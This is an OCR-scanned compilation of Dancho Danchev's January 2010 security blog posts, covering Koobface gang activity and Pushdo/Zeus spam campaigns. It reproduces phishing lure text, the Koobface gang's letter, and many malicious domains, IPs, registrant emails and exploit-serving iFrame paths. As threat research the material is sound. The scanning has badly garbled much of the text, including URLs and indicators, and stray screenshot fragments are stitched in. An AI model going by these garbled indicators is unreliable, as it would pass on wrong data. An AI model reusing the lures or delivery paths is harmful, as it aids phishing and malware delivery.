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Summarizing Zero Day's Posts for December (2010- 
01-04 22:03) 

The following is a brief summary of all of my posts at 
[l]ZDNet's Zero Day for December, 2009. 

You can also go through [2]previous summaries, as well as 
subscribe to my [3]personal RSS feed, [4]Zero Day's 

main feed, or follow all of [5]ZDNet's blogs on Twitter. 

01. [6]Koobface botnet enters the Xmas season 

02. [7]How many people fall victim to phishing attacks? 




03. [8]Zeus crimeware using Amazon's EC2 as command and 
control server 

04. [9]Report: Google's reCA PTC HA flawed 

05. [ 10]FBI: Scareware distributors stole $150M 

This post has been reproduced from [HJDancho Danchev's 
blog. 

1. http://blo a s.zdnet.com/securit v 

2. http://ddanchev.blo as pot.com/20Q9/ll/summarizin a -zero- 
davs- posts-for.html 

3. http://updates.zdnet.com/ta a s/dancho-l-danchev.html? 
t=Q&s=Q&o=l&mode=rss 

4. http://feeds.feedburner.com/zdnet/securit v 

5. http://twitter.com/zdnetblo as 

6. http://blo a s.zdnet.com/securit v/? p=5001 

7. http://blo a s.zdnet.com/securit v/? p=5084 
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8. http://blo a s.zdnet.com/securit v/? p=5110 

9. http://blo a s.zdnet.com/securit v/? p=5123 

10. http://blo a s.zdnet.com/securit v/? p=5140 

11. http://ddanchev.blo as pot.com/ 
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Top Ten Must-Read Posts at ZDNet's Zero Day for 
2009 (2010-01-04 22:10) 


The end of the year naturally means a rush to come up with 
'best of the best' top lists consisting of your finest content. 
However, based on personal observations, during the 
holidays season the short attention span of the 

average reader becomes even shorter with everyone looking 
forward to taking a well-deserved break. Therefore, 

the first working week of the new year appears to be the 
perfect moment to summarize some of my most insightful 

posts/analysis published at [l]ZDNet's Zero Day for 2009. 





The following ten posts have been featured due to their 
insightful content, comprehensiveness of the topic 

covered, and due to plain simple exclusivity in the time of 
their publishing. You will be, of course, missing the big 
picture if you don't keep track of [2]Ryan Naraine's 
coverage. 

Thank you for being a [3]Zero Day reader! 

01. [4]Microsoft study debunks phishing profitability 
02. [5]lnside BBC's Chimera botnet 

03. [6]China's 'secure' OS Kylin - a threat to U.S offsensive 
cyber capabilities? 

04. [7]Microsoft study debunks profitability of the 
underground economy 

05. [8]lranian opposition launches organized cyber attack 
against pro-Ahmadinejad sites - [9]Related coverage 06. 
[10]The Ultimate Guide to Scareware Protection 
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07. [ll]'Anonymous' group attempts DDoS attack against 
Australian government (Operation Didgeridie) 08. 
[12]Google's CAPTCHA experiment and the human factor 

09. [13]Does software piracy lead to higher malware 
infection rates? 

10. [14]Koobface botnet enters the Xmas season 

Related posts: 

[15]Summarizing Zero Day's Posts for January, 2009 



[16] Summarizing Zero Day's Posts for February, 2009 

[17] Summarizing Zero Day's Posts for March, 2009 

[18] Summarizing Zero Day's Posts for April, 2009 

[19] Summarizing Zero Day's Posts for May, 2009 

[20] Summarizing Zero Day's Posts for June, 2009 

[21] Summarizing Zero Day's Posts for July, 2009 

[22] Summarizing Zero Day's Posts for August, 2009 

[23] Summarizing Zero Day's Posts for September, 2009 

[24] Summarizing Zero Day's Posts for October, 2009 

[25] Summarizing Zero Day's Posts for November, 2009 

[26] Summarizing Zero Day's Posts for December, 2009 

This post has been reproduced from [27]Dancho Danchev's 
blog. 

1. http://blo a s.zdnet.com/securit v 

2. http://updates.zdnet.com/ta a s/Rvan + Naraine.html 

3. http://feeds2.feedburner.com/zdnet/securit v 

4. http://blo a s.zdnet.com/securit v/? p = 2366 

5. http://blo a s.zdnet.com/securit v/? p = 3045 

6. http://blo a s.zdnet.com/securit v/? p = 3385 

7. http://blo a s.zdnet.com/securit v/? p = 3522 




















8. http://blo a s.zdnet.com/securit v/? p = 3613 


9. http://ddanchev.blo as pot.com/2009/06/iranian-o p position- 
ddos-es-pro.html 

10. http://blo a s.zdnet.com/securit v/? p=4297 

11. http://blo a s.zdnet.com/securit v/? p=4234 

12. http://blo a s.zdnet.com/securit v/? p=3178 

13. http://blo a s.zdnet.com/securit v/? p=4605 

14. http://blo a s.zdnet.com/securit v/? p=5001 

15. http://ddanchev.blo as pot.com/2009/Q2/summarizin a- 
zero-da vs- posts-for- i anuarv.html 

16. http://ddanchev.blo as pot.com/2009/Q3/summarizin a- 
zero-da vs- posts-for.html 

17. http://ddanchev.blo as pot.com/2009/Q3/summarizin a- 
zero-da vs- posts-for-march.html 

18. http://ddanchev.blo as pot.com/2009/05/summarizin a- 
zero-da vs- posts-for-april.html 

19. http://ddanchev.blo as pot.com/2009/Q6/summarizin a- 
zero-da vs- posts-for-mav.html 

20. http://ddanchev.blo as pot.com/2009/Q7/summarizin a- 
zero-da vs- posts-for- i une.html 

21. http://ddanchev.blo as pot.com/2009/Q8/summarizin a- 
zero-da vs- posts-for- iul v.html 

22. http://ddanchev.blo as pot.com/2009/Q9/summarizin a- 
zero-da vs- PQSts-for-au a ust.html 
































































23. http://ddanchev.blo as pot.com/20Q9/10/summarizin a- 
zero-da vs- posts-for.html 


24. http://ddanchev.blo as pot.com/20Q9/ll/summarizin a- 
zero-da vs- posts-for-october.html 

25. http://ddanchev.blo as pot.com/20Q9/ll/summarizin a- 
zero-da vs- posts-for.html 

26. http://ddanchev.blo as pot.com/201Q/01/summarizin a- 
zero-da vs- posts-for.html 

27. http://ddanchev.blo as pot.com/ 
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Our taam, so oftan callad "Koobfaca Gang*, high gratitude for tha halp in bug fixing, rasaarchas and documantation for our 

software to; 


• Kaspersky Lab for tha nama of Koobfaca and 25 millionth malicious program award; 

a Dane ho Danchav ( http://ddanchav.bloospot.coni ') who worked hard every day especially on our First Software & Architecture version, 
writing lots of e*mails to different hosting companies and structures to take down our Command*and*Control (C&C) servers, and of 
course analyzing software underVM Ware; 

e Trend Micro ( http://trendmicro.com ). especially personal thanks Jonell Battazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes we’ve ever made; 

a Cisco for their 3rd place to our software in their annual "working groups awards"; 

• Soren Siebert with his great article ; 

a Hundreds of users who send us logs, crash reports, and wish-lists. 


In fact, it was a really hard year. We*ve made many efforts to improve our software. Thanks to Facebook’s security team - the guys made us 
move ahead. And we’ve moved. And will move. Improving tAa/r security system. 

by the way, we did not have a cent using Twitter’s traffic. But many security issues tell the world we did. They are wrong. 

As many people know, "virus" is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not oror ttoai <rrdit <ard or onhnr bunk information, pa* % word* or any otkor <onfidantiai data. And Will MOT £V£R. 

As for the crashes... We are really sorry. We work on it i) 


Wish you a good luck in new year and... Merry Christmas to you! 

Always yours, "Koobface Gang". 

Top Ten Must-Read DDanchev Posts For 2009 (2010- 
01-04 22:37) 

The following ten posts have been featured due to their 
insightful content, comprehensiveness of the topic covered, 
and due to plain simple exclusivity in the time of publishing, 
and not necessarily based on page views. 


























Thank you for being a regular reader of my personal blog. 
Feel free to subscribe to [l]my RSS feed, keep track 

of [2]my posts at ZDNet's Zero Day, or [3]follow me on 
Twitter. 

01. [4]Conficker's Scareware/Fake Security Software 
Business Model 

02. [5]Koobface Botnet's Scareware Business Model - Part 
One and [6]Part Two 

03. [7]lnside a Money Laundering Group's Spamming 
Operations 

04. [8]A Peek Inside the Managed Blackhat SEO Ecosystem 

05. [9]lranian Opposition DDoS-es pro-Ahmadinejad Sites 

06. [10]Koobface Botnet Redirects Facebook's IP Space to 
my Blog 

07. [lljStandardizing the Money Mule Recruitment Process 

08. [12]Koobface Botnet Starts Serving Client-Side Exploits 

09. The SMS Ransomware series - [13]SMS Ransomware 
Displays Persistent Inline Ads; [14]SMS Ransomware Source 
Code Now Offered for Sale; [ 15]3rd SMS Ransomware Variant 
Offered for Sale; [16]4th SMS Ransomware Variant 

Offered for Sale; [17]5th SMS Ransomware Variant Offered 
for Sale; [18]6th SMS Ransomware Variant Offered for 

Sale 

10. [19]The Koobface Gang Wishes the Industry "Happy 
Holidays" 



This post has been reproduced from [20]Dancho Danchev's 
blog. 

1. 

http://feeds.feedburner.com/DanchQDanchevOnSecuritvAnd 

NewMedia 

2. http://updates.zdnet.com/ta a s/dancho+danchev.html? 
o=l&mode=rss 

3. http://twitter.com/danchodanchev 

4. http://ddanchev.blo as pQt.com/2009/04/confickers- 
scarewarefake-securitv.html 

5. http://ddanchev.blo as pot.com/2009/Q9/koobface-botnets- 
scareware-business.html 

6. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnets- 
scareware-business.html 

7. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a roups-spammin a .html 
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8. http://ddanchev.blo as pot.com/2009/Q6/peek-inside- 
mana a ed-blackhat-seo.html 

9. http://ddanchev.blo as pot.com/2009/Q6/iranian-o p position- 
ddos-es-pro.html 

10. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
redirects-facebooks-ip.html 

11. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-muie-recruitment.html 













































12. http://ddanchev.blo as pot.com/2009/ll/koobface-botnet- 
starts-servin a -cllient.html 


13. http://ddanchev.blo as pot.com/2009/Q9/sms-ransomware- 
displa vs- persistent.html 

14. http://ddanchev.blo as pot.com/2009/05/sms-ransomware- 
source-code-now-offered.html 


15. http://ddanchev.blo as pot.com/2009/Q5/3rd-sms- 
ransomware-variant-offered-for.html 


16. http://ddanchev.blo as pot.com/2009/07/4th-sms- 
ransomware-variant-offered-for.html 


17. http://ddanchev.blo as pot.com/2009/Q7/5th-sms- 
ransomware-variant-offered-for.html 


18. http://ddanchev.blo as pot.com/2009/Q8/6th-sms- 
ransomware-variant-offered-for.html 


19. http://ddanchev.blo as pot.com/20Q9/12/koobface- a an a- 
wishes-industrv-ha oo v.html 

20. http://ddanchev.blo as oot.com/ 


10 































Happy Mew Year clip 

It's a gift from Abba, all for free! Enjoy! [link] 

By Abba - 12:36am - 1 new of 1 message 

Happy New Year 

Happy New Year! A little gift: [link] 

By Santa Claus - Jan 6 - 1 new of 1 message 

Mv new clip 

Hi! My new video, for funs :) [link] 

By Rebecca MacKinnon - Jan 4 - 1 new of 1 message 

Have Ypu Seen 

Hi to my group friends! Have You seen this new video? [link] 

By Valeria - Jan 2 - 1 new of 1 message 

Celebrities mistakes in New Year speach 

U-ga-ga.. New Year party, Drunk Celebrities Exposed Just look at this: [link] 

By Reporter X - Jan 2 - 1 new of 1 message 

Mv wedding videp 

Hi. Here isour wedding video. Happy New Year! [link] 

By Celicia Johnson - Dec 31 2009 - 1 new of 1 message 

A ieke 

O-ha-ha What are they doing? PS Just a joke, but so funny :) [link] 

By Anna F - Dec 30 2009 - 1 new of 1 message 

Very cute and funnv kids) 

This is so cute and funny)) [link] 

By KittyJenns - Dec 27 2009 - 1 new of 1 message 

Super funnv animals)))) 

aaaaa))))look at this)))they'r soooo funny, can't stop smiling)) [link] 

By SaraSamuelson - Dec 25 2009 - 1 new of 1 message 

Scareware, Blackhat SEO, Spam and Google Groups 
Abuse, Courtesy of the Koobface Gang 

(2010-01-08 17:29) 

The Koobface gang is known to have embraced the potential 
of the "underground multi-tasking" model a long time ago, in 
order to achieve the "malicious economies of scale" effect. 
This "underground multi-tasking" most commonly comes in 
the form of multiple monetization campaigns, which upon 






























closer analysis always lead back to the Koobface gang's 
infrastructure. In fact, the gang is so obsessed with 
efficiency, that particular redirectors and key malicious 
domains for a particular campaign, are also, simultaneously 
rotated across all the campaigns that they manage. 

For instance, throughout the past half an year, a huge 
percentage of the malicious infrastructure used simulta¬ 
neously in multiple campaigns, was parked on the [l]now 
shut down Riccom LTD - AS29550. From the [2]massive 

blackhat SEO campaigns affecting millions of legitimate web 
sites managed by the gang, to the [3]malvertising attack at 
the New York Times web site, and [4]the click-fraud 
facilitating [5]Bahama botnet, the Koobface botnet is only 
the tip of the iceberg for the efficient and fraudulent money 
machine that the gang operates. 
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f My computer 


BE® 


Arkess: My computer 

System Tasks 

A 

jv) Vew system nfdrmabon 


tS Add or remove programs 


O' Change a settings 


Other Places 

* 

My Network Places 


tjMy Documents 


Cj) Shared Documents 


O' Control Panel 


1 Details 

£ I 

My Computer 


System Folder 



B 


System folders 


Shared Documents 

0 2 Viruses found 


My Documents 


Hard drive 


Hard dnve (C:) 

0 2 Viruses found 


Security 


f 


Windows Security 


53% 

Checking: c;\,. Default User VAcpl>ca ton DataV*crosoftVedkcs32.di 


Your Computer is infected 


* WARNING 


Name 

Type 

Threat level 

0 Trojan.Qoologic - Key Logger 

Vrus 

High 

0 W9S/Etkcrn F Secure 

Virus 

High 


Recommend: Cldc "Start Protection" button to erase it threats 


Start Protection | 


In this analysis, I'll once again establish a connection 
between the ongoing blackhat SEO campaigns managed by 
the gang ( [6]B\ackhat SEO Campaign Hijacks U.S Federal 
Form Keywords, Serves Sea re ware; [7JU.S Federal Forms 
Blackhat SEO Themed Scareware Campaign Expanding; 

[8] Dissecting the Ongoing U.S Federal Forms Themed 
Blackhat SEO 

Campaign ), with a spam campaign that's also syndicated 
across multiple Google Groups, and the Koobface botnet 
itself, with a particular emphasis on the scareware 
monetization taking place across all the campaigns. 

Related Koobface research and analysis: 

[9] The Koobface Gang Wishes the Industry "Happy Holidays" 


















[10] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[11] Koobface Botnet Starts Serving Client-Side Exploits 

[12] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[13] Koobface Botnet's Scareware Business Model - Part Two 

[14] Koobface Botnet's Scareware Business Model - Part One 

[15] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[16] New Koobface campaign spoofs Adobe's Flash updater 

[17] Social engineering tactics of the Koobface botnet 
12 

[18] Koobface Botnet Dissected in a TrendMicro Report 

[19] Movement on the Koobface Front - Part Two 

[20] Movement on the Koobface Front 

[21] Koobface - Come Out, Come Out, Wherever You Are 

[22] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [23]Dancho Danchev's 
blog. 

1. http://ddanchev.blo as pot.com/20Q9/12/koobface-friendl v- 
riccom-ltd-as29550.html 

2. http://ddanchev.blo as pot.com/2009/ll/nnassive- 
scareware-servin a -blackhat-seo.html 









3. http://ddanchev.blo as pot.com/2009/Q9/ukrainian-fan-club- 
features.html 

4. http://blo a s.zdnet.com/securit v/? p=4549 

5. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnets- 
scareware-business.html 

6. http://ddanchev.blo as pot.com/2009/Q8/blackhat-seo- 
campai a n-hi i acks-us.html 

7. http://ddanchev.blo as pot.com/2009/Q8/us-federal-forms- 
blackhat-seo-themed.html 


8. http://ddanchev.blo as pot.com/2009/08/dissectin a- 
ona oin a -us-federal-forms.html 

9. http://ddanchev.blo as pot.com/2009/12/koobface- a an a- 
wishes- i ndustrv-ha op v.html 

10. http://ddanchev.blo as pot.com/20Q9/12/koobface- 
friendlv-riccom-ltd-as29550.html 

11. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnet- 
starts-servin a -client.html 

12. http://ddanchev.blo as pot.com/20Q9/ll/massive- 
scareware-servin a -blackhat-seo.html 

13. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 


14. http://ddanchev.blo as pot.com/2009/Q9/koobface- 
botnets-scareware-business.html 


15. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
redirects-facebooks- ii p.html 


















































16. http://blo a s.zdnet.com/securit v/? p=4594 

17. http://cpntent.zdnet.cpm/2346-12691 22-352597.html 

18. http://ddanchev.blc as pct.cem/2009/10/keebface-betnet- 
dissected-in-trendmicrc.html 


19. http://ddanchev.blp as ppt.ccm/2009/08/mpvement-pn- 
koobface-front-part-two.html 

20. http://ddanchev.blp as ppt.cpm/2009/08/mpvement-pn- 
koobface-front.html 


21. http://ddanchev.blc as pct.ccm/2009/07/kcpbface-cpme- 
put-cpme-put-wherever-vpu.html 

22. http://ddanchev.blp as pct.cpm/2009/07/dissectin a- 
koobface-wprms-twitter.html 


23. http://ddanchev.blc as pat.cpm/ 
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e-mail service: 

new settings file for fx@ mailbox 


C!n MIcrosofTOffice 

cib Outlook Web Access 

Provided by Microsoft Exchange Server 2003 


Microsoft 


The default settings of your mailbox were automatically changed. Please download and 
launch a file with a new set of settings for your e-mail account: 

fx-settings-file.exe 


Security 

We constantly work on the quality level of our service, as well as on the development of its 
security and protection. During the last upgrade several essential improvements were 
adopted, such as new ports for the POP3 & SMTP protocols, plus the SMTP autentification, 
The new settings are necessary for those who use the mailings clients (for ex. Microsoft 
Outlook, The Bat!, Mozilla Thunderbird etc.) or those who use our service via the web- 
interface. 


'o protect your account from unauthorized access, Outlook Web Access automatically ends your mail session after 
i period of inactivity. If your session ends, and the Logon page is not displayed, click on a mail folder (e.g., 
nbox), and you should be redirected to the Logon page, where you can log on again. 


Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware (2010-01-08 23:53) 

UPDATED: Sunday, January 10, 2010 - The post has been 
updated with the latest domains spammed within the past 24 
hours. 

UPDATED: Saturday, January 09, 2010 - The post has 
been updated with the latest domains spammed within 

the past 24 hours. The spam campaign is ongoing. 








A currently ongoing spam campaign is using the "Your 
default mailbox settings have changed" theme, in order to 
infect gullible users into executing Trojan-Spy.Win32.Zbot 
([ljsettings-file.exe). 

Sample message: 

" The default settings of your mailbox were automatically 
changed. Please download and launch a file with a new set of 
settings for your e-mail account:fx-settings-file.exe. 

We constantly work on the quality level of our service, as 
well as on the development of its security and protection. 
During the last upgrade several essential improvements 
were adopted, such as new ports for the POP3 & SMTP 
protocols, plus the SMTP autentification. The new settings 
are necessary for those who use the mailings clients 14 



188.560.W16 


AS 


► AS16135 


188 56 139.174 



AS27699 

AS8151 

AS9121 

AS7418 

AS12140 

AS13489 

AS4766 

AS17676 

AS9829 

AS9674 

AS18182 

AS9116 


(forex. Microsoft Outlook, The Bat!, Mozilla Thunderbird etc.) 
or those who use our service via the web-interface. " 

Sample campaign structure: 

molendf.co .kr/owa/service directory/settings, php? 
email =fx@ya hoo.com 

&from=yahoo.com &fromname=fx 





























Fast-fluxed seed IPs: 


61.64.170.232 

77.126.141.142 

188.56.139.174 

189.110.244.68 

189.179.13.36 

190.82.217.255 

195.174.109.241 
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•.com.molendl.co.kr 



200.169.71.144 

201.232.187.200 

201.236.48.117 

210.106.80.90 


218.153.64.25 




221.26.184.25 


59.92.58.166 

61.20.133.88 

DNS servers of notice: 

nsl.moorcargo .net 

nsl.aj-realtors .com - Email: support@ajr.com 

nsl.groupswat .com 
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nsl.elkins-realty .net - Email: BO.la@yahoo.com 

nsl.nocksold .com - Email: termer@counsellor.com 

nsl.seldomservice .net - 89.238.165.195 - Email: 
pp0271@gmail.com 

nsl.viking-gave .net - 89.238.165.195 - Email: 
glonders@gmail.com 

nsl.controlpanellsolutions .com - 212.95.50.175 - Email 
jobwes@clerk.com 

Hundreds of typosquatted subdomains reside within the 
following currently active domains: 

ujjiks.co .im 

ujjiks.com .im 

ujjiks.org .im 

ujjikx.co .im 



ujjikx.com .im 
ujjikx.org .im 
molendf.co .kr 
molendf .com 
molendf .kr 
molendf.ne .kr 
molendf.or .kr 
vcrssdl .cc 
vcrssdl .eu 
vfrtssd .com 
vsmprot.co .uk 
vsmprot .com 
vsmprot .eu 
vsmprot.me .uk 
vsmprot.org .uk 
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119 152 58 (V24 


119 152 58 111 





ikuu8a .com - Email: bjnjnsls@technologist.com 
ikuu8d .com - Email: bjnjnsls@technologist.com 
ikuu8e .com - Email: bjnjnsls@technologist.com 
ikuu8q .com - Email: bjnjnsls@technologist.com 
ikuu8s .com - Email: bjnjnsls@technologist.com 






























ikuu8w .com - Email: bjnjnsls@technologist.com 
ikuu8x .com - Email: bjnjnsls@technologist.com 
ikuu8z .com - Email: bjnjnsls@technologist.com 
ikuu8a .net - Email: bjnjnsls@technologist.com 
ikuu8e .net - Email: bjnjnsls@technologist.com 
ikuu8q .net - Email: bjnjnsls@technologist.com 
ikuu8s .net - Email: bjnjnsls@technologist.com 
ikuu8w .net - Email: bjnjnsls@technologist.com 
ikuu8x .net - Email: bjnjnsls@technologist.com 
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■ s ► AS21788 


A9262 


ikuu8z .net - Email: bjnjnsls@technologist.com 
yhuttte.ne .kr - Email: scepterpdg@chemist.com 
yhuttti.ne .kr - Email: scepterpdg@chemist.com 
yhutttu.ne .kr - Email: scepterpdg@chemist.com 
yhuttte .kr - Email: scepterpdg@chemist.com 



































yhuttti .kr - Email: scepterpdg@chemist.com 
yhuttte.co .kr - Email: scepterpdg@chemist.com 
yhuttti.co .kr - Email: scepterpdg@chemist.com 
yhutttr.co .kr - Email: scepterpdg@chemist.com 
yhutttu.co .kr - Email: scepterpdg@chemist.com 
yhuttte.or .kr - Email: scepterpdg@chemist.com 
yhuttti.or .kr - Email: scepterpdg@chemist.com 
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yhutttr.or .kr - Email: scepterpdg@chemist.com 
yhutttu.or .kr - Email: scepterpdg@chemist.com 
yhutttr .kr - Email: scepterpdg@chemist.com 
yhutttu .kr - Email: scepterpdg@chemist.com 
ujyhl.ne .kr - Email: combinetct@financier.com 
ujyho.ne .kr - Email: combinetct@financier.com 
ujyhf .kr - Email: combinetct@financier.com 
ujyhl .kr - Email: combinetct@financier.com 
ujyhf.co .kr - Email: combinetct@financier.com 
ujyhl.co .kr - Email: combinetct@financier.com 
ujyho.co .kr - Email: combinetct@financier.com 


ujyhs.co .kr - Email: combinetct@financier.com 
ujyho .kr - Email: combinetct@financier.com 
ujyhf.or .kr - Email: combinetct@financier.com 
ujyhl.or .kr - Email: combinetct@financier.com 
ujyho.or .kr - Email: combinetct@financier.com 
ujyhs.or .kr - Email: combinetct@financier.com 
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ujyhs .kr - Email: combinetct@financier.com 

Seen within the past 24 hours, now offline domains part of 
the campaign: 

yhe3essa .com.pl 

yhe3essd .com.pl 

yhe3esse .com.pl 

yhe3essf .com.pl 

yhe3essg .com.pl 

yhe3essi .com.pl 

yhe3esso .com.pl 

yhe3essp .com.pl 

yhe3essq .com.pl 


yhe3essr .com.pl 
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yhe3esss .com.pl 

yhe3esst .com.pl 

yhe3essu .com.pl 

yhe3essw .com.pl 

yhe3essy .com.pl 

ok9i 

iol .com 

ok9i 

io2 .com 

ok9i 

io3 .com 

ok9i 

io4 .com 

ok9i 

io5 .com 

ok9i 

io6 .com 

ok9i 

io7 .com 

ok9i 

io8 .com 

ok9i 

iol .net 

ok9i 

io2 .net 

ok9i 

io3 .net 

ok9i 

io4 .net 

ok9i 

io5 .net 





ok9iio6 .net 


ok9iio7 .net 

Upon execution the sample phones back to the already 
[2]blacklisted by the Zeus Tracker nekovo .ru: 

nekovo .ru/cbd/nekovo.bri; nekovo .ru/ip.php - 

109.95.114.70 - Email: kievsk@yandex.ru - AS50215 - 
Troyak-as Starchenko Roman Fedorovich. 

Related Zeus crimeware name servers respond to the same 
IP: 

- nsl.trust-service .cn - (domain itself [3]responds to 
193.104.41.133) - Email: olezhiosapiel@yahoo.es 

- nsl.elnasa .ru - (domain itself [4]responds to 
91.200.164.12) - Email: kievsk@yandex.ru 

- nsl.recessa .ru - (domain itself [5]responds to 
193.104.41.69) - Email: kievsk@yandex.ru 

- nsl.stomaid .ru - (domain itself [6]responds to 
91.200.164.10) - Email: kievsk@yandex.ru 

Parked withn the same AS, are also the following currently 
active Zeus crimeware serving domains: 

web-information-services .com - 91.198.109.69 - Email 
pita@bigmailbox.ru 

erthjuyt44u .com - 91.198.109.19 - Email: rails@qx8.ru 

excellenthostingservice .com - 91.198.109.48 - Email: 
xm@qx8.ru 



goldhostingservice .com - 91.198.109.32 - Email: 
clod@qx8.ru 

Pretty much your typical cybercrime-friendly virtual 
neighborhood. 

Related posts: 

[7] Pushdo Injecting Bogus Swine Flu Vaccine 

[8] M Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[9] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[10] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [HJDancho Danchev's 
blog. 

1 . 

http://www.virustotal.com/analisis/26efaeec869a31abb49fdc 

C6ef82207fl234f92b73de01589e8294a053f31d7b-12629 

87325 
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2. https://zeustracker.abuse.ch/monitor. oh p?host=nekovo.ru 

3. https://zeustracker.abuse.ch/monitor. oh p?host=trust- 
service.cn 

4. https://zeustracker.abuse.ch/monitor. ph p?host=elnasa.ru 

5. https://zeustracker.abuse.ch/monitor. ph p?host=recessa.ru 














6. https://zeustracker.abuse.ch/monitor. ph p?host=stomaid.ru 


7. http://ddanchev.blo as pot.com/20Q9/12/pushdo-in i ectin a- 
bo a us-swine-f1u.html 

8. http://ddanchev.blo as pot.com/20Q9/ll/vour-mailbox-has- 
been-deactivated-spam.html 

9. http://ddanchev.blo as pot.com/20Q9/10/on a oin a -fdic- 
s pam-campai a n-serves-zeus.html 

10. http://ddanchev.blo as pot.com/2009/Q7/multitaskin a -fast- 
f1ux-botnet-that.html 


11. http://ddanchev.blo as pot.com/ 
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Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams (2010-01-13 21:10) 

UPDATED, Friday, 15, 2010: The gang continues rotating 
the campaigns by targeting different brands. Over the 24 

hours they've spamming the well known 11 Notice of 
Underreported Income" theme this time targeting HM 
Revenue and Customs (HMRC), and have also introduced 
new portfolios of typosquatted domains next to changing the 

client-side exploits serving iFrame embedded on each and 
every page. 

- Sample message: "F iling and paying your federal taxes 
correctly and on time is an important part of living and 24 


























working in the United Kingdom. Please review (download and 
execute) your tax statement, if the statement is 

incorrect, contact our Taxpayer Advocate Service. " 

-Sample URL: online.hmrc.gov.uk.olpiku5v 
. com.pl/Securi ty WebApp/h ttpsmode/sta tern en t. php 

Detection ratesfortax-statement.exe ([l]Trojan- 
Spy.Win32.Zbot.gen) and file.exe ([2]Trojan- 
Spy.Win32.Zbot.gen). 

Upon execution, the samples attempt to connect to elnasa 
.ru/asd/elnasa.ble (109.95.114 .71/asd/elnasa.ble). 

The structure of the iFrame, now using an IP address instead 
of a domain name, remains the same: 

- 109.95.114.251 /uksl/in.php - 109.95.114.251 - 
AS50369 - VISHCLUB-as Kanyovskiy Andriy Yuriyovich - 
akanyovskiy@troyak.org 

- 109.95.114.251 /u ksl/j query, jxx 

- 109.95.114.251 /u ks 1/xd/pdf. pdf 

- 109.95.114.251 /uksl/load.php 

- 109.95.114.251 /uksl/file.exe 

DNS servers of notice: 

nsl.pds-properties .com - 89.238.165.195 
nsl.noeproperties .com - 84.243.201.159 
nsl.densondatabase .com - 94.23.177.147 


nsl.dogsgrem .net - 89.238.165.195 - Email: 
glonders@gmail.com - Email seen in [3]previous domain 
registrations 25 

Typosquatted domains spammed over the past 24 hours: 

olpiku5a .com.pl 
olpiku5b .com.pl 
olpiku5c .com.pl 
olpiku5d .com.pl 
olpiku5e .com.pl 
olpiku5f .com.pl 
olpiku5g .com.pl 
olpiku5q .com.pl 
olpiku5r .com.pl 
olpiku5s .com.pl 
olpiku5t .com.pl 
olpiku5v .com.pl 
olpiku5w .com.pl 
olpiku5x .com.pl 
olpiku5z .com.pl 
ujo9ia .com.pl 
ujo9id .com.pl 



ujo9ie .com.pl 
ujo9if .com.pl 
ujo9ig .com.pl 
ujo9ih .com.pl 
ujo9im .com.pl 
ujo9in .com.pl 
ujo9iq .com.pl 
ujo9ir .com.pl 
ujo9is .com.pl 
ujo9it .com.pl 
ujo9iw .com.pl 
ujo9iy .com.pl 
ujo9iz .com.pl 
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tlllut .me.uk 
tllluy .me.uk 
tllluz .me.uk 
tllluk .org.uk 
tlllut .org.uk 


tllluz .org.uk 
tllluk .co.uk 
tllluy .co.uk 
okiolh .ne.kr 
okiolw .ne.kr 
okiolh .kr 
okiolh .co.kr 
okiolu .co.kr 
okiolv .co.kr 
okiolw .co.kr 
okiolh .or.kr 
okiolu .or.kr 
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okiolv .or.kr 
okiolw .or.kr 
okiolu .kr 
okiolv .kr 
okiolw .kr 
proterpl .im 


virtditl .im 



virtdit2 .im 


virtdit3 .im 
virtdit4 .im 
virtdit5 .im 
virtdit6 .im 
virtdit7 .im 
virtdit8 .im 

UPDATED: Gary Warner offers additional insights into the 
latest campaigns - [4]This Week in Avalanche / Zbot 

/ Zeus Bot: HSBC & eBay. 

What the botnet masters forget is that with each and every 
campaign, based on a number of factors, they re¬ 
veal more about themselves and their affiliations within the 
cybercrime ecosystem. The degree of monetization 

is proportional with the loss of OPSEC (operational security), 
and this remains valid for any fraudulent campaign, botnet or 
cybercrime community in general. 

UPDATED: To clarify, in this campaign Pushdo acts as [5]the 
spam platform for the [6]Avalanche/MS-Redirect botnet. 

In need of a good example why you shouldn't be interacting 
with spam/phishing emails in any other way but 

reporting/deleting them, unless of course you're in the 
business of analyzing them? 
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Last week's [7]0WA-themed Zeus-serving spam campaign 
courtesy of the Pushdo botnet, has not just resumed, 

but is continuing to serve client-side exploits (CVE-2007- 
5659; CVE-2008-2992; CVE-2009-0927) to anyone visiting 

the spammed web sites through an iFrame embedded on all 
of them. Such traffic optimization tactics are nothing 

new, since the botnet master is anticipating the fact that the 
visitor that clicked on the link, may not be that stupid the 
next time, so attempting to serve the malware without any 
kind of interaction on his behalf through client-side exploits 
is the tactic of choice. 

Let's dissect the campaign, list all of the currently active fast- 
fluxed domains, the name servers of notice, the client-side 
exploit serving structure, and the Russian Brides scam 
domains spamvertised over the last few days. 
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Active fast-fluxed domains part of the campaign: 
leptprs.co .kr - Email: wawddhaepny@yahoo.com 
leptprs .kr - Email: wawddhaepny@yahoo.com 
leptprs.ne .kr - Email: wawddhaepny@yahoo.com 
leptprs.or .kr - Email: wawddhaepny@yahoo.com 
oki8uuu.co .kr - Email: wawddhaepny@yahoo.com 


ui7772.co .kr - Email: jn.hadler@jkh.org.uk 
ui7772 .kr - Email: jn.hadler@jkh.org.uk 
ui7772.ne .kr - Email: jn.hadler@jkh.org.uk 
ui7772.or .kr - Email: jn.hadler@jkh.org.uk 
